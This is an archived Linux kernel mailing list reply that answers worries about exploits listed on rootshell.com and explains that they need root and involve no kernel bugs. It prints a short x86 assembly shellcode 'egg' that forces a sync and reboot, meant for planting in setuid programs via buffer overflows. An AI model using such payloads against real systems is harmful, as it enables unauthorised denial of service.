>Hi guys,
>
>Has anyone read http://www.rootshell.com's July summaries lately? There
>are some security holes in Linux that *needs* fixing, before
>script-kiddies starts hacking our boxes to hell and back. :O(
>
>Some of them uses x86 assembler - and one was particularly nasty in that
>it gave chmod 777 access to /etc/passwd - yikes!!
Yes, they all work, but they all need root access to run. Here is the
reboot code:
reb00t:
xorl %eax,%eax
movb $0x24,%eax
int $0x80
xorl %eax,%eax
movb $0x58,%eax
movl $0xfee1dead,%ebx
movl $672274793,%ecx
movl $0x1234567,%edx
int $0x80
xorl %eax,%eax
movb $0x01,%al
int $0x80
Looking in include/asm-i386/unistd.h, it calls sync(), reboot(), then
exit(). Not dangerous, these are intended to be used as buffer
overflow eggs to plant in setuid root programs. No kernel bugs.
The one kernel "bug" listed is currently being discussed on bugtraq
and does not pose any immediate threat.
Zachary Amsden
amsden@andrew.cmu.edu
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.altern.org/andrebalsa/doc/lkml-faq.html